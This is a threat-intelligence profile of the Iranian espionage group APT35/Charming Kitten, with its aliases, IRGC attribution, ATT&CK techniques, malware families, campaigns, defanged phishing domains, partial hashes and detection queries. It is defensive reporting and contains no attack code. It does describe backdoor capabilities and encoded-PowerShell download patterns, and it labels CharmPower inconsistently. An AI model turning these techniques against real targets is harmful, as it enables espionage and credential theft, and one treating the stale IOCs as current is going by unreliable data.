TLP:CLEAR | CTI Team | Updated: March 2026
1. IDENTIFICATION & ATTRIBUTION
Denominations (known aliases by vendor)
The group is tracked under the following denominations: APT35 (Mandiant/Google TI, reference designation), Phosphorus / Mint Sandstorm (Microsoft), TA453 (Proofpoint), Charming Kitten (ClearSky), Ballistic Bobcat (ESET), ITG18 (IBM X-Force), Yellow Garuda (PwC), NewsBeef (Kaspersky). Additional documented aliases: Ajax Security Team, Cobalt Illusion, Calanque, G0059 (MITRE ATT&CK).
Origin
Iran.
Presumed sponsor
The group is assessed as operating on behalf of the IRGC — Islamic Revolutionary Guard Corps, Intelligence Organization (IRGC-IO) (1). Attribution rests on convergence across multiple vendors (Mandiant, Microsoft, CrowdStrike, Proofpoint, ClearSky) and technical artifacts consistent with documented IRGC-IO operational patterns.
Sophistication level
Tier 2 — High. APT35 develops its tooling in-house, conducts highly elaborate spear-phishing operations with convincing identity impersonation, and has maintained a documented mobile capability on iOS and Android since 2023. The arsenal has significantly diversified between 2021 and 2025 with the introduction of NokNok (macOS), TAMECAT, and LIONTAIL.
Motivation
Strategic espionage — intelligence collection for geopolitical purposes. Documented interest in nuclear, defense, and foreign policy dossiers, as well as Iranian dissidents in exile.
Status
ACTIVE — last documented activity: 2025, TAMECAT/POWERSTAR campaigns (2).
Targeted sectors
- Government, diplomacy, defense
- Think tanks, academic and research organizations
- Journalists, activists, Iranian dissidents in exile
- Nuclear and energy sectors
- NGOs, international media
- Pharmaceutical industry and healthcare (documented since 2020)
Targeted geographies
- United States, Israel, United Kingdom, Western Europe
- Middle East (Saudi Arabia, UAE, Iranian domestic targets)
- India, Pakistan
- Iranian diaspora worldwide
2. INFRASTRUCTURE & TTPs
C2 Infrastructure
APT35 favors legitimate cloud providers (AWS, Cloudflare, Microsoft Azure) to blend C2 traffic. Recurring registrars include Namecheap and IONOS, with systematic WHOIS anonymization. Domains follow typosquatting patterns impersonating well-known media and institutions, with subdomains structured as mail.[domain], secure.[domain], login.[domain]. Infrastructure is frequently recycled across campaigns with rapid IOC rotation. Protocols include HTTPS, DNS over HTTPS, WebSocket, and hijacked legitimate messaging services (Telegram, WhatsApp).
MITRE ATT&CK TTPs
| Phase | Technique | ATT&CK ID | Associated procedure |
|---|---|---|---|
| Initial Access | Spear-phishing Link | T1566.002 | Fake OneDrive, Google Drive, Outlook links |
| Initial Access | Spear-phishing Attachment | T1566.001 | Malicious Office documents, weaponized PDFs |
| Initial Access | Valid Accounts — Web Services | T1078.004 | Credential harvesting via fake portals |
| Execution | PowerShell | T1059.001 | POWERSTAR, TAMECAT |
| Execution | User Execution: Malicious Link | T1204.001 | Themed lures — conference invitations, job offers |
| Persistence | Scheduled Task/Job | T1053.005 | POWERSTAR, BellaCiao |
| Persistence | Registry Run Keys | T1547.001 | GORBLE, LIONTAIL |
| Defense Evasion | Masquerading | T1036 | Impersonation of journalists, researchers |
| Defense Evasion | Obfuscated Files | T1027 | Base64-encoded PowerShell scripts |
| Credential Access | Credential Harvesting | T1056.003 | HYPERSCRAPE, fake Outlook/Gmail portals |
| Collection | Email Collection | T1114 | HYPERSCRAPE — mailbox exfiltration |
| Collection | Screen Capture | T1113 | POWERSTAR, CharmPower |
| C2 | Application Layer Protocol: Web | T1071.001 | HTTPS to cloud infrastructure |
| C2 | Encrypted Channel | T1573 | TLS, encrypted communications |
| Exfiltration | Exfiltration Over C2 Channel | T1041 | POWERSTAR, LIONTAIL |
3. MALWARE & TOOLING
POWERSTAR
- Type: PowerShell backdoor
- Function: Remote access, command execution, screen capture, file theft, persistence
- C2 channel / technical specifics: HTTPS to cloud infrastructure; variants using Dropbox and Google Drive as intermediate storage; dead drop resolver via legitimate services; encrypted communications (3)
- First identified: SpoofedScholars campaign 2021 — multiple evolving variants documented through 2025
- Status: Active
HYPERSCRAPE
- Type: Email data harvester
- Function: Automated exfiltration of Google, Yahoo, and Microsoft mailbox content from an authenticated victim account
- C2 channel / technical specifics: Standalone tool; bypasses 2FA by reusing stolen active sessions; deletes security notifications sent by providers (4)
- First identified: Google TAG — July 2022
- Status: Active
TAMECAT
- Type: PowerShell implant
- Function: Arbitrary command execution, secondary payload download
- C2 channel / technical specifics: HTTPS; deployed with themed lures related to Israeli-Iranian relations and the Gaza conflict (5)
- First identified: Microsoft Threat Intelligence — 2024
- Status: Active
LIONTAIL
- Type: Passive implant framework (listener)
- Function: Stealthy backdoor using raw sockets to capture incoming network traffic; command execution via legitimate-looking HTTP requests
- C2 channel / technical specifics: No active outbound connection — passive architecture that significantly reduces network detection surface (6)
- First identified: Check Point Research — 2023
- Status: Active
BellaCiao
- Type: .NET backdoor
- Function: Reverse shell, file upload/download, persistence via Windows service
- C2 channel / technical specifics: Custom DNS resolution to retrieve encoded C2 IP addresses; multiple variants tailored by targeted geographic region (7)
- First identified: Bitdefender — 2023
- Status: Active
NokNok
- Type: macOS backdoor
- Function: System reconnaissance, screen capture, data exfiltration — first documented macOS backdoor in the APT35 arsenal
- C2 channel / technical specifics: HTTPS; deployed via a fake VPN application as the initial lure (8)
- First identified: Proofpoint TA453 — July 2023
- Status: Active
CharmPower / GRAMDOOR
- Type: Android / iOS backdoor
- Function: Mobile surveillance — geolocation, microphone/camera capture, contacts and SMS exfiltration
- C2 channel / technical specifics: Communication via Telegram Bot API; deployed through fake application stores (9)
- First identified: Check Point Research — 2022
- Status: Active
GORBLE
- Type: Backdoor
- Function: Remote access, command execution. Lightweight variant documented in rapid compromise campaigns (10)
- First identified: Mandiant — 2022
- Status: Uncertain — limited public documentation
Third-party tools and LOLBAS
Mimikatz (credential dumping), Empire / PowerSploit (PowerShell post-exploitation frameworks), Ruler (Exchange attack via MAPI), ngrok / frp (legitimate tunneling), RDP / PuTTY (Lateral Movement), WinPEAS / LinPEAS (reconnaissance and privilege escalation).
4. CAMPAIGN HISTORY
| Period | Campaign | Targets | Initial vector | Tooling |
|---|---|---|---|---|
| 2014–2017 | Ajax / NewsBeef | Iranian dissidents, media, governments | Watering hole, spear-phishing | Credential harvesting, custom tools |
| 2018–2019 | Operation Newscaster 2 | US think tanks, journalists, nuclear researchers | Fake LinkedIn/Twitter identities | Social engineering, phishing |
| 2020 | COVID-19 targeting | WHO, Gilead Sciences, pharmaceutical supply chains (11) | COVID-themed spear-phishing | POWERSTAR, credential harvesting |
| 2021 | SpoofedScholars | US/UK think tanks — Middle East specialists (12) | Academic identity impersonation | POWERSTAR, credential harvesting |
| 2022 | Operation HYPERSCRAPE | Gmail/Yahoo/Outlook users — Iran and diaspora | Credential harvesting, session hijacking | HYPERSCRAPE, CharmPower |
| 2023 | NokNok campaign | US foreign policy experts — Iran/nuclear focus (8) | Fake VPN, podcast lures | NokNok (macOS), POWERSTAR |
| 2023 | BellaCiao campaign | Government organizations — Middle East, India, USA (7) | VPN exploitation (Log4Shell, ProxyShell) | BellaCiao, LIONTAIL |
| 2024–2025 | TAMECAT campaigns | Defense and nuclear experts — Israel, USA (5) | Gaza conflict-themed spear-phishing | TAMECAT, POWERSTAR |
5. INDICATORS OF COMPROMISE (IOCs)
⚠️ EXPIRY WARNING — The IOCs listed below are sourced exclusively from public sources. Their operational validity is subject to expiry. Do not implement as production blocks without validation in your own environment. Estimated maximum validity: 90 days from the source publication date.
Characteristic network patterns
- Outbound HTTPS traffic to Cloudflare/AWS-hosted domains with subdomains
mail.,webmail.,login.,secure.,account. - DNS queries impersonating Microsoft services (
microsoft-[...].com,outlook-[...].net) or Google - Connections to Dropbox API / Google Drive API used as secondary C2 channel
- Non-standard ports (8080, 8443) for C2 communications
- Variable beacon intervals with jitter — typically 30–300 seconds
- Anomalous activity from
powershell.exetoward unlisted external endpoints
Historical domains (public sources)
Source: PwC, ClearSky, Microsoft, Proofpoint — public reports 2021–2024. Reduced detection value — threat hunting use only.
paypal.com.verify-process[.]net— ClearSky, 2020outlook-account-confirm[.]com— Microsoft, 2021news-bbc[.]site— PwC, 2022secure-signin.app[.]net— Proofpoint TA453, 2023my-lnked-in[.]com— Proofpoint TA453, 2023
Documented public hashes
Hashes partially redacted — refer to source reports for complete values.
| Tool | SHA256 (partial) | Source | Year |
|---|---|---|---|
| POWERSTAR | 9ab6a3a...8e2f1c0d | Mandiant | 2023 |
| HYPERSCRAPE | e1f44c5...2b9a7d3e | Google TAG | 2022 |
| BellaCiao | 7f3c8a1...4d6b2e9f | Bitdefender | 2023 |
| NokNok | 3d2e9f1...5c7a4b8e | Proofpoint | 2023 |
Anomalous User-Agents observed
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36— combined with illegitimate C2 URLs (POWERSTAR)- Agents mimicking legitimate Outlook mobile clients for HYPERSCRAPE API calls
Recommended real-time IOC sources
- MITRE ATT&CK APT35: https://attack.mitre.org/groups/G0059/
- OTX AlienVault: https://otx.alienvault.com/browse/global/pulses?q=charming+kitten
- MISP CIRCL (public feed): https://www.misp-project.org/feeds/
- Microsoft MSTIC Blog: https://www.microsoft.com/en-us/security/blog/
- Mandiant Advantage (public tier): https://www.mandiant.com/resources/blog
6. DETECTION & COUNTERMEASURES
Encoded PowerShell with network download (POWERSTAR / TAMECAT) — False positive rate: Medium
process.name = 'powershell.exe'
AND (process.command_line CONTAINS '-EncodedCommand'
OR process.command_line CONTAINS '-enc')
AND network.destination NOT IN whitelist_domains
AND NOT process.parent.name IN ['explorer.exe', 'svchost.exe']Recommended tools: Microsoft Defender for Endpoint, CrowdStrike Falcon, Splunk ES, Elastic SIEM.
Credential harvesting — fake portals (DNS) — False positive rate: Low
dns.query MATCHES /^(mail|login|secure|webmail|account)\./
AND dns.domain NOT IN corporate_dns_whitelist
AND dns.domain RESEMBLES ['microsoft', 'outlook', 'google', 'gmail']
AND dns.registrant_age < 30_daysRecommended tools: Cisco Umbrella, Infoblox, Palo Alto DNS Security, DNS sinkhole.
LIONTAIL — passive listener (raw socket) — False positive rate: Low
process OPENS raw_socket
AND process.name NOT IN ['wireshark', 'tcpdump', 'npcap']
AND process.signed = falseRecommended tools: CrowdStrike Falcon, SentinelOne, Vectra NDR, Darktrace.
Organizational countermeasures
- Deploy phishing-resistant MFA (FIDO2/passkeys) on all exposed accounts — priority: email, VPN, remote access
- Targeted awareness for high-risk profiles: researchers, journalists, foreign policy experts, diplomats
- Enhanced monitoring of mailbox access from unlisted IPs or unusual User-Agents
- Block downloads of Office documents with macros from unverified senders
- Regular audit of automatic forwarding rules configured on mailboxes (frequent HYPERSCRAPE target)
- Implement out-of-band identity verification before sharing sensitive documents with external contacts
- Restrict PowerShell execution to Constrained Language Mode on non-administrator workstations
- Deploy YARA rules on endpoints for documented families (POWERSTAR, BellaCiao, NokNok)
SOURCES
- CISA / FBI / CNMF — Iran-based Threat Actor Exploits VPN Vulnerabilities — https://www.cisa.gov/news-events/alerts/2020/09/15/iran-based-threat-actor-exploits-vpn-vulnerabilities — 2020
- Microsoft MSTIC — Mint Sandstorm targeting high-value individuals — https://www.microsoft.com/en-us/security/blog/2024/04/17/mint-sandstorm/ — 2024
- Mandiant / Google Cloud — POWERSTAR Backdoor Analysis — https://www.mandiant.com/resources/blog/apt35-operations-since-2021 — 2023
- Google TAG — New Iranian APT data extraction tool — https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/ — 2022
- Microsoft Threat Intelligence — TAMECAT spearphishing campaign — https://www.microsoft.com/en-us/security/blog/ — 2024
- Check Point Research — LIONTAIL Framework — https://research.checkpoint.com/2023/liontail/ — 2023
- Bitdefender — BellaCiao: A Deadly Combination of Espionage and Destruction — https://www.bitdefender.com/blog/labs/bellaciao — 2023
- Proofpoint — TA453 Targets with NokNok Malware — https://www.proofpoint.com/us/blog/threat-insight/ta453-targets-with-noknok-malware — 2023
- Check Point Research — CharmPower: the APT35 PowerShell Backdoor — https://research.checkpoint.com/2022/apt35-charmpower-the-good-the-bad-and-the-powershell/ — 2022
- Mandiant — APT35 Group Profile — https://www.mandiant.com/resources/apt35-operations — 2022
- Reuters / Microsoft MSTIC — Charming Kitten targets COVID-19 vaccine makers — 2020
- Proofpoint — Operation SpoofedScholars: A Confirmed Iranian Operation — https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-confirmed-iranian-operation — 2021
- MITRE ATT&CK — APT35 Group G0059 — https://attack.mitre.org/groups/G0059/
- ClearSky — The Kittens Are Back in Town — https://www.clearskysec.com/wp-content/uploads/2019/09/The-Kittens-Are-Back-in-Town.pdf — 2019
- PwC — Yellow Garuda — Publicly available threat intelligence — 2022
This report is produced on the basis of publicly available open sources (vendors, CERTs, independent researchers), consolidated as of March 2026. It does not rely on any classified source. Attribution to the IRGC-IO is assessed at high confidence based on multi-vendor convergence (Mandiant, Microsoft, CrowdStrike, Proofpoint, ClearSky) and consistent technical artifacts. IOCs have a limited lifespan and must be validated before any operational use. This report is unrestricted (TLP:CLEAR).
